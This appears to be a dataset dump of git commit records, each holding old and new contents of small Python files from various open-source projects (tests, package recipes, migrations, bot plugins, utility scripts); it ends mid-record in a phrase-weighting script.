commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
4a179825234b711a729fce5bc9ffc8de029c0999 | Test for invalid data when loading | robotframework/RIDE,robotframework/RIDE,HelioGuilherme66/RIDE,HelioGuilherme66/RIDE,caio2k/RIDE,robotframework/RIDE,HelioGuilherme66/RIDE,robotframework/RIDE,HelioGuilherme66/RIDE,fingeronthebutton/RIDE,fingeronthebutton/RIDE,fingeronthebutton/RIDE,caio2k/RIDE,caio2k/RIDE | utest/controller/test_loading.py | utest/controller/test_loading.py | import unittest
from robot.utils.asserts import assert_true, assert_raises, assert_raises_with_msg
from robotide.controller import ChiefController
from robotide.namespace import Namespace
from resources import MINIMAL_SUITE_PATH, RESOURCE_PATH, FakeLoadObserver
from robot.errors import DataError
class TestDataLoading(unittest.TestCase):
def setUp(self):
self.ctrl = ChiefController(Namespace())
self.load_observer = FakeLoadObserver()
def test_loading_suite(self):
self._load(MINIMAL_SUITE_PATH)
assert_true(self.ctrl._controller is not None)
def test_loading_resource(self):
self._load(RESOURCE_PATH)
assert_true(self.ctrl.resources != [])
def test_loading_invalid_data(self):
assert_raises(DataError, self._load, 'invalid')
def _load(self, path):
self.ctrl.load_data(self.load_observer, path)
assert_true(self.load_observer.finished)
def test_loading_invalid_datafile(self):
assert_raises_with_msg(DataError, 'Invalid data file: invalid.',
self.ctrl.load_datafile, FakeLoadObserver(),
'invalid')
def test_loading_invalid_resource(self):
assert_raises_with_msg(DataError, 'Invalid resource file: invalid.',
self.ctrl.load_resource, 'invalid')
if __name__ == "__main__":
unittest.main()
| import unittest
from robot.utils.asserts import assert_true, assert_raises
from robotide.application.chiefcontroller import ChiefController
from robotide.namespace import Namespace
from resources import MINIMAL_SUITE_PATH, RESOURCE_PATH
from robot.errors import DataError
class _FakeObserver(object):
def notify(self):
pass
def finished(self):
self.finished = True
class TestDataLoading(unittest.TestCase):
def setUp(self):
self.ctrl = ChiefController(Namespace())
self.load_observer = _FakeObserver()
def test_loading_suite(self):
self._load(MINIMAL_SUITE_PATH)
assert_true(self.ctrl._controller is not None)
def test_loading_resource(self):
self._load(RESOURCE_PATH)
assert_true(self.ctrl.resources != [])
def test_loading_invalid_data(self):
assert_raises(DataError, self._load, 'invalid')
def _load(self, path):
self.ctrl.load_data(self.load_observer, path)
assert_true(self.load_observer.finished)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | Python |
f8d49af459fb3b751f44ecf625521c62fa68df0a | Check in script to delete existing autochecked tasks | sunil07t/e-mission-server,e-mission/e-mission-server,sunil07t/e-mission-server,e-mission/e-mission-server,shankari/e-mission-server,shankari/e-mission-server,shankari/e-mission-server,shankari/e-mission-server,e-mission/e-mission-server,sunil07t/e-mission-server,e-mission/e-mission-server,sunil07t/e-mission-server | bin/ext_service/historical/fix_autocheck_tasks.py | bin/ext_service/historical/fix_autocheck_tasks.py | import logging
import argparse
import uuid
import emission.core.wrapper.user as ecwu
import emission.core.get_database as edb
import emission.net.ext_service.habitica.proxy as proxy
def fix_autocheck_for_user(uuid):
auto_tasks = find_existing_auto_tasks(uuid)
delete_tasks(uuid, auto_tasks)
create_new_tasks(uuid)
# I wanted to reuse existing code, but it is unclear how to do so.
# in particular, I will have either the format of the old tests or of
# the new tests. Most PRs will not keep the old and the new around side
# to side. Since this is a historical, as opposed to ongoing script, I
# think this is fine.
def find_existing_auto_tasks(uuid):
method_uri = "/api/v3/tasks/user"
get_habits_uri = method_uri + "?type=habits"
#First, get all habits and check if the habit requested already exists
result = proxy.habiticaProxy(uuid, 'GET', get_habits_uri, None)
habits = result.json()
auto_tasks = []
for habit in habits['data']:
print habit['text'], habit["notes"], habit["id"]
if "automatically" in habit['notes']:
logging.debug("Found auto task %s, %s, %s" %
(habit['text'], habit['notes'], habit['id']))
auto_tasks.append(habit)
else:
if len(habit["challenge"]) > 0:
logging.info("Found challenge task %s, %s, %s, unsure what to do" %
(habit['text'], habit['notes'], habit['id']))
else:
logging.debug("Found manual task %s, %s, %s" %
(habit['text'], habit['notes'], habit['id']))
return auto_tasks
def delete_tasks(uuid, task_list):
method_uri = "/api/v3/tasks/"
for task in task_list:
curr_task_del_uri = method_uri + str(task["id"])
result = proxy.habiticaProxy(uuid, 'DELETE', curr_task_del_uri, {})
logging.debug("Result of deleting %s = %s" % (task["id"], result.json()))
def create_new_tasks(uuid):
pass
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG)
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-e", "--user_email")
group.add_argument("-u", "--user_uuid")
group.add_argument("-a", "--all", action="store_true")
args = parser.parse_args()
if args.all:
for uuid in edb.get_habitica_db().distinct("user_id"):
logging.debug("About to check user %s" % uuid)
fix_autocheck_for_user(uuid)
else:
if args.user_uuid:
del_uuid = uuid.UUID(args.user_uuid)
else:
del_uuid = ecwu.User.fromEmail(args.user_email).uuid
fix_autocheck_for_user(del_uuid)
| bsd-3-clause | Python |
|
89ef576ba4e707eef653c670b32fa40d862e79ec | Add package for the Python regex library (#4771) | tmerrick1/spack,krafczyk/spack,iulian787/spack,iulian787/spack,iulian787/spack,mfherbst/spack,tmerrick1/spack,tmerrick1/spack,TheTimmy/spack,TheTimmy/spack,lgarren/spack,EmreAtes/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack,matthiasdiener/spack,krafczyk/spack,lgarren/spack,krafczyk/spack,skosukhin/spack,lgarren/spack,iulian787/spack,krafczyk/spack,LLNL/spack,LLNL/spack,tmerrick1/spack,matthiasdiener/spack,skosukhin/spack,EmreAtes/spack,mfherbst/spack,TheTimmy/spack,TheTimmy/spack,EmreAtes/spack,iulian787/spack,mfherbst/spack,mfherbst/spack,mfherbst/spack,matthiasdiener/spack,lgarren/spack,EmreAtes/spack,krafczyk/spack,TheTimmy/spack,LLNL/spack,LLNL/spack,skosukhin/spack,tmerrick1/spack,matthiasdiener/spack,skosukhin/spack,lgarren/spack,skosukhin/spack | var/spack/repos/builtin/packages/py-regex/package.py | var/spack/repos/builtin/packages/py-regex/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyRegex(PythonPackage):
"""Alternative regular expression module, to replace re."""
homepage = "https://pypi.python.org/pypi/regex/"
url = "https://pypi.io/packages/source/r/regex/regex-2017.07.11.tar.gz"
version('2017.07.11', '95f81ebb5273c7ad9a0c4d1ac5a94eb4')
depends_on('py-setuptools', type='build')
| lgpl-2.1 | Python |
|
0e6a7a805ff08f191c88bda67992cb874f538c2f | Add migration for unitconnection section types | City-of-Helsinki/smbackend,City-of-Helsinki/smbackend | services/migrations/0097_alter_unitconnection_section_type.py | services/migrations/0097_alter_unitconnection_section_type.py | # Generated by Django 4.0.5 on 2022-06-22 05:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("services", "0096_create_syllables_fi_columns"),
]
operations = [
migrations.AlterField(
model_name="unitconnection",
name="section_type",
field=models.PositiveSmallIntegerField(
choices=[
(1, "PHONE_OR_EMAIL"),
(2, "LINK"),
(3, "TOPICAL"),
(4, "OTHER_INFO"),
(5, "OPENING_HOURS"),
(6, "SOCIAL_MEDIA_LINK"),
(7, "OTHER_ADDRESS"),
(8, "HIGHLIGHT"),
(9, "ESERVICE_LINK"),
(10, "PRICE"),
(11, "SUBGROUP"),
],
null=True,
),
),
]
| agpl-3.0 | Python |
|
9009315381edd69adac3319b973b3bcdb16f23e4 | Add missing module wirecloud.live.utils | jpajuelo/wirecloud,jpajuelo/wirecloud,jpajuelo/wirecloud,jpajuelo/wirecloud | src/wirecloud/live/utils.py | src/wirecloud/live/utils.py | # -*- coding: utf-8 -*-
# Copyright (c) 2016 CoNWeT Lab., Universidad Politécnica de Madrid
# This file is part of Wirecloud.
# Wirecloud is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Wirecloud is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
# You should have received a copy of the GNU Affero General Public License
# along with Wirecloud. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
from base64 import b64encode
def build_group_name(name):
return b"wc-%s" % b64encode(name.encode('utf-8'), b'-_').replace(b'=', b'.')
WIRECLOUD_BROADCAST_GROUP = build_group_name('live-*')
| agpl-3.0 | Python |
|
5e49eb4fb6bce9cdeae515590530b78e4dde89d9 | Add alternate example for `match_template`. | emmanuelle/scikits.image,warmspringwinds/scikit-image,bennlich/scikit-image,rjeli/scikit-image,ofgulban/scikit-image,GaZ3ll3/scikit-image,rjeli/scikit-image,ClinicalGraphics/scikit-image,dpshelio/scikit-image,pratapvardhan/scikit-image,michaelpacer/scikit-image,chintak/scikit-image,michaelaye/scikit-image,chintak/scikit-image,chriscrosscutler/scikit-image,pratapvardhan/scikit-image,michaelaye/scikit-image,oew1v07/scikit-image,paalge/scikit-image,almarklein/scikit-image,ajaybhat/scikit-image,paalge/scikit-image,jwiggins/scikit-image,newville/scikit-image,SamHames/scikit-image,jwiggins/scikit-image,paalge/scikit-image,bsipocz/scikit-image,ajaybhat/scikit-image,blink1073/scikit-image,SamHames/scikit-image,vighneshbirodkar/scikit-image,chintak/scikit-image,almarklein/scikit-image,chintak/scikit-image,newville/scikit-image,ofgulban/scikit-image,SamHames/scikit-image,blink1073/scikit-image,warmspringwinds/scikit-image,WarrenWeckesser/scikits-image,keflavich/scikit-image,vighneshbirodkar/scikit-image,emmanuelle/scikits.image,dpshelio/scikit-image,chriscrosscutler/scikit-image,GaZ3ll3/scikit-image,rjeli/scikit-image,WarrenWeckesser/scikits-image,almarklein/scikit-image,SamHames/scikit-image,vighneshbirodkar/scikit-image,ofgulban/scikit-image,Hiyorimi/scikit-image,michaelpacer/scikit-image,Midafi/scikit-image,ClinicalGraphics/scikit-image,youprofit/scikit-image,emmanuelle/scikits.image,emon10005/scikit-image,Midafi/scikit-image,Hiyorimi/scikit-image,Britefury/scikit-image,robintw/scikit-image,oew1v07/scikit-image,keflavich/scikit-image,Britefury/scikit-image,juliusbierk/scikit-image,almarklein/scikit-image,emmanuelle/scikits.image,emon10005/scikit-image,bsipocz/scikit-image,robintw/scikit-image,youprofit/scikit-image,bennlich/scikit-image,juliusbierk/scikit-image | doc/examples/plot_match_face_template.py | doc/examples/plot_match_face_template.py | """
=================
Template Matching
=================
In this example, we use template matching to identify the occurrence of an
image patch (in this case, a sub-image centered on the camera man's head).
Since there's only a single match, the maximum value in the `match_template`
result` corresponds to the head location. If you expect multiple matches, you
should use a proper peak-finding function.
"""
import numpy as np
import matplotlib.pyplot as plt
from skimage import data
from skimage.feature import match_template
image = data.camera()
head = image[70:170, 180:280]
result = match_template(image, head)
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(8, 4))
ax1.imshow(head)
ax1.set_axis_off()
ax1.set_title('template')
ax2.imshow(image)
ax2.set_axis_off()
ax2.set_title('image')
# highlight matched region
xy = np.unravel_index(np.argmax(result), image.shape)[::-1] # -1 flips ij to xy
wface, hface = head.shape
rect = plt.Rectangle(xy, wface, hface, edgecolor='r', facecolor='none')
ax2.add_patch(rect)
plt.show()
| bsd-3-clause | Python |
|
854fd7de75a14ee030b8f2e8a686dd96f40273de | Add mvn-push.py | onepf/OPF-mvn-repo,onepf/OPF-mvn-repo | mvn-push.py | mvn-push.py | #!/usr/bin/python
import os
import sys
import getopt
from os.path import realpath
from os.path import join
from os.path import basename
import subprocess
help_message = 'mvn-push.py --group package --id package --version version --file file [--javadoc file|path] [--sources file]'
mvn_repo=os.getcwd()
cleanup = ''
def subprocess_cmd(command):
process = subprocess.Popen(command, stdout = subprocess.PIPE, shell = True)
proc_stdout = process.communicate()[0].strip()
if proc_stdout:
print proc_stdout
def check_required(arg_value_name_pairs):
for pair in arg_value_name_pairs:
if not pair[0]:
print pair[1], 'is empty or invalid'
sys.exit(1)
def detect_packaging(file_path):
file_extension = file_path[-4:]
if file_extension == '.aar':
return 'aar'
elif file_extension == '.jar':
return 'jar'
else:
print 'wrong file extension'
sys.exit(1)
def pack_javadoc(file_path, javadoc):
if not javadoc:
return javadoc
else:
global cleanup
temp_jar = basename('%s-javadoc.jar' % file_path[:-4])
subprocess_cmd('cd {0}; jar cf {1} *'.format(javadoc, temp_jar))
cleanup = cleanup + ' ' + join(javadoc, temp_jar)
return join(javadoc, temp_jar)
def deploy(group_id, artifact_id, version, file_path, javadoc, sources, packaging):
mvn_deploy = 'mvn deploy:deploy-file -Durl=file://{0} -DgroupId={1} -DartifactId={2} -Dversion={3} -Dpackaging={4} -Dfile={5}'.format(
mvn_repo, group_id, artifact_id, version, packaging, file_path)
if sources:
mvn_deploy += ' -Dsources=%s' % sources
if javadoc:
mvn_deploy += ' -Djavadoc=%s' % javadoc
subprocess_cmd(mvn_deploy)
def main(argv):
group_id=''
artifact_id=''
version=''
file_path=''
javadoc=''
sources=''
try:
opts, args = getopt.getopt(argv, 'h:', ['group=', 'id=', 'version=', 'file=', 'javadoc=', 'sources='])
except getopt.GetoptError:
print help_message
sys.exit(1)
if len(opts) == 0:
print help_message
sys.exit(1)
for opt, arg in opts:
if opt == '-h':
print help_message
sys.exit()
elif opt == '--group':
group_id = arg
elif opt == '--id':
artifact_id = arg
elif opt == '--version':
version = arg
elif opt == '--file':
file_path = realpath(arg)
elif opt == '--javadoc':
javadoc = realpath(arg)
elif opt == '--sources':
sources = realpath(arg)
check_required(((group_id, 'group'), (artifact_id, 'id'), (version, 'version'), (file_path, 'file')))
packaging = detect_packaging(file_path)
javadoc = pack_javadoc(file_path, javadoc)
deploy(group_id, artifact_id, version, file_path, javadoc, sources, packaging)
subprocess_cmd('rm %s' % cleanup)
if __name__ == '__main__':
main(sys.argv[1:]) | apache-2.0 | Python |
|
f284bb85a0b28142850f980a33f38a3cf25d9da8 | Solve Knowit 2017/08 | matslindh/codingchallenges,matslindh/codingchallenges | knowit2017/08.py | knowit2017/08.py | memoized = {}
def christmas_number(n):
in_sequence = {1: True}
while True:
if n > 10000000:
for k in in_sequence:
memoized[k] = False
return False
in_sequence[n] = True
if n in memoized:
return memoized[n]
n = sum([int(d)**2 for d in str(n)])
if n == 1:
for k in in_sequence:
memoized[k] = True
return True
if n in in_sequence:
for k in in_sequence:
memoized[k] = False
return False
def test_christmas_number():
assert christmas_number(13) is True
if __name__ == "__main__":
s = 0
for n in range(1, 10000001):
if n % 100000 == 0:
print(n)
if christmas_number(n):
s += n
print(s) | mit | Python |
|
2dd0efce803c4dfcc4c5d61cf6fec1d5ee64e1b3 | test for btcSpecialTx.py | ethereum/btcrelay,ethereum/btcrelay,vaporry/btcrelay,ethers/btcrelay | test/test_btcSpecialTx.py | test/test_btcSpecialTx.py | from pyethereum import tester
from datetime import datetime, date
import math
import pytest
slow = pytest.mark.slow
class TestBtcSpecialTx(object):
CONTRACT = 'btcSpecialTx.py'
CONTRACT_GAS = 55000
ETHER = 10 ** 18
def setup_class(cls):
tester.gas_limit = 2 * 10**6
cls.s = tester.state()
cls.c = cls.s.abi_contract(cls.CONTRACT, endowment=2000*cls.ETHER)
cls.snapshot = cls.s.snapshot()
cls.seed = tester.seed
def setup_method(self, method):
self.s.revert(self.snapshot)
tester.seed = self.seed
def test_testnetTx(self):
# testnet tx a51a71f8094f9b4e266fcccd55068e809277ec79bfa44b7bdb8f1355e9bb8460
# tx[9] of block 350559
txStr = '010000000158115acce0e68bc58ecb89e6452380bd68da56dc0a163d9806c04b24dfefe269000000008a47304402207a0bf036d5c78d6910d608c47c9e59cbf5708df51fd22362051b8f1ecd9691d1022055ee6ace9f12f02720ce91f62916570dbd93b2aa1e91be7da8e5230f62606db7014104858527cb6bf730cbd1bcf636bc7e77bbaf0784b9428ec5cca2d8378a0adc75f5ca893d14d9db2034cbb7e637aacf28088a68db311ff6f1ebe6d00a62fed9951effffffff0210980200000000001976a914a0dc485fc3ade71be5e1b68397abded386c0adb788ac10270000000000001976a914d3193ccb3564d5425e4875fe763e26e2fce1fd3b88ac00000000'
res = self.c.getFirst2Outputs(txStr)
assert res[0] == 170000
out1stScriptIndex = res[1]
btcAddrIndex = out1stScriptIndex*2 + 6
assert txStr[btcAddrIndex:btcAddrIndex+40] == 'a0dc485fc3ade71be5e1b68397abded386c0adb7'
out2ndScriptIndex = res[2]
ethAddrIndex = out2ndScriptIndex*2 + 6
assert txStr[ethAddrIndex:ethAddrIndex+40] == 'd3193ccb3564d5425e4875fe763e26e2fce1fd3b'
| mit | Python |
|
edc5116472c49370e5bf3ff7f9f7872732b0285e | Add a solution to the phone number problem: can a phone number be represented as words in a dictionary? | aww/cs_practice | phone_numbers.py | phone_numbers.py | #!/usr/bin/env python
import unittest
words = set(["dog", "clog", "cat", "mouse", "rat", "can",
"fig", "dig", "mud", "a", "an", "duh", "sin",
"get", "shit", "done", "all", "glory", "comes",
"from", "daring", "to", "begin", ])
dialmap = {
'a':2, 'b':2, 'c':2,
'd':3, 'e':3, 'f':3,
'g':4, 'h':4, 'i':4,
'j':5, 'k':5, 'l':5,
'm':6, 'n':6, 'o':6,
'p':7, 'q':7, 'r':7, 's':7,
't':8, 'u':8, 'v':8,
'w':9, 'x':9, 'y':9, 'z':9,
}
def tonumbers(word):
"""Convert the string 'word' into the equivalent string of phone-dailing numbers"""
numstr = ''
for c in word.lower():
numstr += str(dialmap[c])
return numstr
wordsnum = set()
for w in words:
wordsnum.add(tonumbers(w))
def isword(number):
"""Return True if the string of decimal digits 'number' can be represented
as the concatenation of words in the 'words' set, otherwise False."""
if number in wordsnum:
return True
if number in isword.memoized:
return isword.memoized[number]
for i in range(1, len(number)):
a = number[i:]
b = number[:i]
#print locals()
if isword(a) and isword(b):
isword.memoized[number] = True
return True
isword.memoized[number] = False
return False
isword.memoized = {}
class TestIsWord(unittest.TestCase):
def testGetShitDone(self):
self.assertTrue(isword(tonumbers('getshitdone')))
def testHas1(self):
self.assertFalse(isword('1092340345'))
def testDogDog(self):
self.assertTrue(isword(tonumbers('dogdog')))
def testMyNumber1(self):
self.assertFalse(isword('7342393309'))
def testMyNumber2(self):
self.assertFalse(isword('4082434090'))
if __name__ == "__main__":
unittest.main()
| apache-2.0 | Python |
|
904ac79bd278634c97f6f43f4d85bc0c2316117b | add configuration example | xeroc/python-graphenelib | scripts/exchange-bots/config-example.py | scripts/exchange-bots/config-example.py | from bot.strategies.maker import MakerRamp, MakerSellBuyWalls
wallet_host = "localhost"
wallet_port = 8092
wallet_user = ""
wallet_password = ""
witness_url = "ws://testnet.bitshares.eu/ws"
witness_user = ""
witness_password = ""
watch_markets = ["PEG.PARITY : TEST", "PEG.RANDOM : TEST"]
market_separator = " : "
bots = {}
#############################
# Ramps
#############################
bots["MakerRexp"] = {"bot" : MakerRamp,
"markets" : ["PEG.PARITY : TEST"],
"target_price" : "feed",
"spread_percentage" : 0.2,
"volume_percentage" : 30,
"ramp_price_percentage" : 2,
"ramp_step_percentage" : 0.1,
"ramp_mode" : "linear"
}
bots["MakerRamp"] = {"bot" : MakerRamp,
"markets" : ["PEG.PARITY : TEST"],
"target_price" : "feed",
"spread_percentage" : 4,
"volume_percentage" : 30,
"ramp_price_percentage" : 4,
"ramp_step_percentage" : 0.5,
"ramp_mode" : "exponential"
}
#############################
# Walls
#############################
bots["MakerWall"] = {"bot" : MakerSellBuyWalls,
"markets" : ["PEG.PARITY : TEST"],
"target_price" : "feed",
"spread_percentage" : 5,
"volume_percentage" : 10,
"symmetric_sides" : True,
}
bots["MakerBridge"] = {"bot" : MakerSellBuyWalls,
"markets" : ["PEG.PARITY : TEST"],
"target_price" : 1.0,
"spread_percentage" : 90,
"volume_percentage" : 10,
"symmetric_sides" : True,
}
account = "xeroc"
safe_mode = False
| mit | Python |
|
60efa5bbab4463714df8dd93c1c7c606bee4dbaf | add giphy plugin | TeamPeggle/ppp-helpdesk | plugins/giphy.py | plugins/giphy.py | from util import http, hook
@hook.api_key('giphy')
@hook.command('giphy', autohelp=False)
@hook.command('gif', autohelp=False)
@hook.command(autohelp=False)
def giphy(inp, api_key=None):
".giphy [term] -- gets random gif for a term"
data = http.get_json("http://api.giphy.com/v1/gifs/random", { "api_key": api_key, "tag": inp })
return data['data']['image_url']
| unlicense | Python |
|
227a8e0f654c9797a7dedf863f7568d55a6c2f8e | add download sample from go-sciter port | pravic/pysciter | examples/download.py | examples/download.py | """Go sciter example port."""
import sciter
class MyEventHandler(sciter.EventHandler):
def document_complete(self):
print("content loaded.")
pass
def on_data_arrived(self, nm):
print("data arrived, uri:", nm.uri, nm.dataSize)
pass
class Frame(sciter.Window):
def __init__(self):
super().__init__(ismain=True, uni_theme=False, debug=True)
pass
def on_data_loaded(self, nm):
print("data loaded, uri:", nm.uri, nm.dataSize)
pass
def load(self, url):
self.set_title("Download Element Content")
self.load_html(b'''<html><body><span id='url'>Url To Load</span><frame id='content'></frame></body></html>''', "/")
# get root element
root = self.get_root()
# get span#url and frame#content:
span = root.find_first('#url')
content = root.find_first('#content')
# replace span text with url provided
text = span.get_text()
span.set_text(url)
print("span:", text)
# install event handler to content frame to print data_arrived events
self.handler = MyEventHandler(element=content)
print("load content")
content.request_html(url)
pass
pass
if __name__ == '__main__':
import sys
print("Sciter version:", ".".join(map(str, sciter.version())))
if len(sys.argv) < 2:
sys.exit("at least one Sciter compatible page url is needed")
print(sys.argv[1])
frame = Frame()
frame.load(sys.argv[1])
frame.expand()
frame.run_app(False)
| mit | Python |
|
dff9d7a05e2a522b3dbbd7ea18866c5ba1fc0476 | add a !stock plugin for stock images | michaelMinar/limbo,wmv/slackbot-python,uilab-github/slask,NUKnightLab/slask,palachu/sdbot,serverdensity/sdbot,mmisiewicz/slask,Marclass/limbo,UnILabKAIST/slask,TetraEtc/limbo,dorian1453/limbo,sentinelleader/limbo,TetraEtc/limbo,cmyr/debt-bot,shawnsi/limbo,llimllib/limbo,llimllib/limbo,signalnine/alanabot,kesre/slask,kylemsguy/limbo,Whirlscape/debt-bot,freshbooks/limbo,uilab-github/slask,joshshadowfax/slask,ruhee/limbo,akatrevorjay/slask,rizaon/limbo | plugins/stock.py | plugins/stock.py | """!stock <search term> return a stock photo for <search term>"""
from random import shuffle
import re
import requests
from bs4 import BeautifulSoup
def stock(searchterm):
url = "http://www.shutterstock.com/cat.mhtml?searchterm={}&search_group=&lang=en&language=en&search_source=search_form&version=llv1".format(searchterm)
r = requests.get(url)
soup = BeautifulSoup(r.text)
images = [x["src"] for x in soup.select(".gc_clip img")]
shuffle(images)
return images[0] if images else ""
def on_message(msg, server):
text = msg.get("text", "")
match = re.findall(r"!stock (.*)", text)
if not match: return
searchterm = match[0]
return stock(searchterm)
| mit | Python |
|
d26a78d3e0695e0bf492910c530beb54b30cdbbc | bump version number for development | pombredanne/stdeb,astraw/stdeb,pombredanne/stdeb,sathieu/stdeb,astraw/stdeb,sathieu/stdeb,benthomasson/stdeb,LeMeteore/stdeb,pombredanne/stdeb,benthomasson/stdeb,astraw/stdeb,LeMeteore/stdeb,benthomasson/stdeb,sathieu/stdeb,LeMeteore/stdeb | stdeb/__init__.py | stdeb/__init__.py | # setuptools is required for distutils.commands plugin we use
import logging
import setuptools
__version__ = '0.4.2.git'
log = logging.getLogger('stdeb')
log.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
| # setuptools is required for distutils.commands plugin we use
import logging
import setuptools
__version__ = '0.4.2'
log = logging.getLogger('stdeb')
log.setLevel(logging.INFO)
handler = logging.StreamHandler()
handler.setLevel(logging.INFO)
formatter = logging.Formatter('%(message)s')
handler.setFormatter(formatter)
log.addHandler(handler)
| mit | Python |
1cab72ac3c5f3cea8326ebc97ccae1a8068eb839 | Add http responses collection module. | kaleidos/django-superview,kaleidos/django-superview | superview/http.py | superview/http.py | # -*- coding: utf-8 -*-
"""
The various HTTP responses for use in returning proper HTTP codes.
"""
from django.http import HttpResponse, StreamingHttpResponse
class HttpCreated(HttpResponse):
status_code = 201
def __init__(self, *args, **kwargs):
location = kwargs.pop('location', '')
super(HttpCreated, self).__init__(*args, **kwargs)
self['Location'] = location
class HttpAccepted(HttpResponse):
status_code = 202
class HttpNoContent(HttpResponse):
status_code = 204
class HttpMultipleChoices(HttpResponse):
status_code = 300
class HttpSeeOther(HttpResponse):
status_code = 303
class HttpNotModified(HttpResponse):
status_code = 304
class HttpBadRequest(HttpResponse):
status_code = 400
class HttpUnauthorized(HttpResponse):
status_code = 401
class HttpForbidden(HttpResponse):
status_code = 403
class HttpNotFound(HttpResponse):
status_code = 404
class HttpMethodNotAllowed(HttpResponse):
status_code = 405
class HttpConflict(HttpResponse):
status_code = 409
class HttpGone(HttpResponse):
status_code = 410
class HttpTooManyRequests(HttpResponse):
status_code = 429
class HttpApplicationError(HttpResponse):
status_code = 500
class HttpNotImplemented(HttpResponse):
status_code = 501
| bsd-3-clause | Python |
|
86baa4f437cf3892c15a56e8331c19b6d2e63b1d | Add a script for generating unicode name table | GNOME/gnome-characters,GNOME/gnome-characters,GNOME/gnome-characters,GNOME/gnome-characters,GNOME/gnome-characters | lib/gen-names.py | lib/gen-names.py | #!/usr/bin/python3
# Input: https://www.unicode.org/Public/UNIDATA/UnicodeData.txt
import io
import re
class Builder(object):
def __init__(self):
pass
def read(self, infile):
names = []
for line in infile:
if line.startswith('#'):
continue
line = line.strip()
if len(line) == 0:
continue
(codepoint, name, _other) = line.split(';', 2)
# Names starting with < are signifying controls and special blocks,
# they aren't useful for us
if name[0] == '<':
continue
names.append((codepoint, name))
return names
def write(self, data):
print('''\
struct CharacterName
{
gunichar uc;
const char *name;
};''')
print('static const struct CharacterName character_names[] =\n {')
s = ''
offset = 0
for codepoint, name in data:
print(' {{ 0x{0}, "{1}" }},'.format(codepoint, name))
print(' };')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='build')
parser.add_argument('infile', type=argparse.FileType('r'),
help='input file')
args = parser.parse_args()
builder = Builder()
# FIXME: argparse.FileType(encoding=...) is available since Python 3.4
data = builder.read(io.open(args.infile.name, encoding='utf_8_sig'))
builder.write(data)
| bsd-3-clause | Python |
|
a50190fe04e434ce70f6b02027e281a896dbb81b | Create Python password hasher | drussell393/Linux-Password-Hash | passwordhash.py | passwordhash.py | #!/usr/bin/env python
# Password Hashing Module for Linux
# Author: Dave Russell Jr (drussell393)
from getpass import getpass
import crypt
# If you like Python 2, please to be importing.
import os
import binascii
password = getpass('Enter your desired password, Harry: ')
passwordConfirm = getpass('Confirm your password: ')
if (password == passwordConfirm):
# Python 2 alternative, os.urandom()
passwordHash = crypt.crypt(password, '$6$' + binascii.hexlify(os.urandom(4)))
# Python 3 likes my crypt (mksalt doesn't work in Python 2)
#passwordHash = crypt.crypt(password, crypt.mksalt(crypt.METHOD_SHA512))
print('You\'re a wizard, Harry: ' + passwordHash)
else:
print('Dobby has heard of your greatness, sir. But of your goodness, Dobby never knew.')
print('Your confirmation password didn\'t match, Oh Great One.')
| mit | Python |
|
961e9b031b94a0533c53c29787660ab954b6db37 | Add patch-weight.py, patch weight into phrase segs. | SnakeHunt2012/word2vec,SnakeHunt2012/word2vec,SnakeHunt2012/word2vec,SnakeHunt2012/word2vec,SnakeHunt2012/word2vec | patch-weight.py | patch-weight.py | #!/usr/bin/env python
# -*- coding: utf-8
from codecs import open
from argparse import ArgumentParser
DEBUG_FLAG = False
def load_weight_dict(weight_file):
weight_dict = {}
with open(weight_file, 'r') as fd:
for line in fd:
splited_line = line.strip().split()
if len(splited_line) != 2:
continue
word, weight = splited_line
if word not in weight_dict:
weight_dict[word] = float(weight)
return weight_dict
def main():
parser = ArgumentParser()
parser.add_argument("weight_file", help = "word-weight in tsv format")
parser.add_argument("phrase_file", help = "phrase segment file (original phrase and segmented phrase) one phrase per line in tsv format")
args = parser.parse_args()
phrase_file = args.phrase_file
weight_file = args.weight_file
weight_dict = load_weight_dict(weight_file)
word_set = set(weight_dict)
with open(phrase_file, 'r') as fd:
for line in fd:
splited_line = line.strip().split("\t")
if len(splited_line) != 2:
continue
phrase_str, phrase_seg = splited_line
phrase_seg_list = phrase_seg.split()
phrase_seg_set = set(phrase_seg_list)
outside_word_set = phrase_seg_set - word_set
if len(outside_word_set) > 0:
if DEBUG_FLAG:
print "###outsidewords###", " ".join(list(outside_word_set))
for word in outside_word_set:
weight_dict[word] = 0.0
weight_sum = sum([weight_dict[word] for word in phrase_seg_list])
if DEBUG_FLAG:
if weight_sum == 0.0:
